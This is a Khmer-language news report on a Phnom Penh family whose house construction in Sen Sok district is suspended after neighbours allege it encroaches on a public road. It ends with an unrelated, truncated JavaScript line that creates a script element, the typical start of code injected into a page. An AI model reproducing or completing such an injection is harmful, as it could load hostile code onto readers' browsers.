សំណង់ផ្ទះមួយកន្លែងកំពុងសាងសង់នៅសង្កាត់ឃ្មួញត្រូវប្រជាពលរដ្ឋចោទប្រកាន់ថាសង់រំលោភលើផ្លូវសាធារណៈ
ភ្នំពេញ៖សំណង់ផ្ទះមួយកន្លែង កំពុងធ្វើការសាងសង់ ដែលមានទីតាំងនៅផ្លូវលំ ភូមិត្រពាំងរាំងថ្មី សង្កាត់ឃ្មួញ ខណ្ឌសែនសុខ រាជធានីភ្នំពេញ ត្រូវបានប្រជាពលរដ្ឋរស់នៅជិតខាងប្តឹងអាជ្ញាធរខណ្ឌខណ្ឌសែនសុខ ចុះផ្អាកជាលើកទី៣ ដោយចោទប្រកាន់ថា សំណងផ្ទះមួយនេះ សង់រំលោភសំណីផ្លូវសាធារណៈ។
ម្ចាស់ផ្ទះកំពុងសាងសង់ ដែលត្រូវបានប្រជាពលរដ្ឋប្តឹងអាជ្ញាធរខណ្ឌខណ្ឌសែនសុខ ចុះផ្អាកការសាងសង់ជាលើក ទី៣នេះ ដោយចោទប្រកាន់ថា សង់រំលោភសំណីផ្លូវសាធារណៈនោះ មានប្តីឈ្មោះ ប៊ុន សាវឿន ឆ្នាំកំណើត ១៩៧០ និងប្រពន្ធឈ្មោះ ផុន ផល្លា ឆ្នាំកំណើត ១៩៧១ បច្ចុប្បន្នរស់នៅផ្ទះកំពុងសាងសង់ខាងលើ ។
ប្តីប្រពន្ធទាំង២នាក់ ប្រាប់ឲ្យដឹងថា ពួកគាត់ទាំង ២នាក់ មិនដឹងថា មូលហេតុអ្វី បានជាអាជ្ញាធរខណ្ឌខណ្ឌសែនសុខ ចុះមកផ្អាកការសាងសង់លំនៅដ្ឋានរបស់ពួកគាត់នោះទេ ពីព្រោះនៅពេលដែលអាជ្ញាធរខណ្ឌចុះមកផ្អាកម្តងៗ មិនដែលបានបង្ហាញលិខិតចុះផ្អាកនោះឡើយ ថាមកពីមូលហេតុអ្វី ? ដែលធ្វើឲ្យពួកគាត់ទាំងអស់គ្នា មានការងឿងឆ្ងន់យ៉ាងខ្លាំង ។ ប៉ុន្តែអ្វីដែលពួកគាត់តាមដានដឹង គឺដោយសារអ្នករស់នៅជិតខាងប្តឹងចោទប្រកាន់ពួកគាត់ថា សង់ផ្ទះនៅលើចំណីផ្លូវសាធារណៈ ។
ពាក់ព័ន្ធទៅនិងករណីនារសៀលថ្ងៃទី៦ ខែមិនុថា ឆ្នាំ២០១៦ លោក ថេង សុថុល អភិបាលខណ្ឌសែនសុខប្រាប់ឲ្យដឹងថា ក្រោយពីទទួលបានពាក្យបណ្តឹងប្រជាពលរដ្ឋ ដោយចោទប្រកាន់ថា ក្រុមគ្រួសារមួយនេះសាងសង់ផ្ទះនៅ លើចំណីផ្លូវសាធារណៈ លោកក៏បញ្ជាក្រុមការងារឲ្យទៅពិនិត្យឃើញថា សំណង់ខាងលើនេះ បានសាងសង់អត់ច្បាប់ និងឲ្យផ្អាកការសាងសង់ជាបណ្តោះអាសន្ន ដើម្បីរង់ចាំធ្វើការដោះស្រាយនាពេលក្រោយ៕
var d=document;var s=d.createElement(‘script’);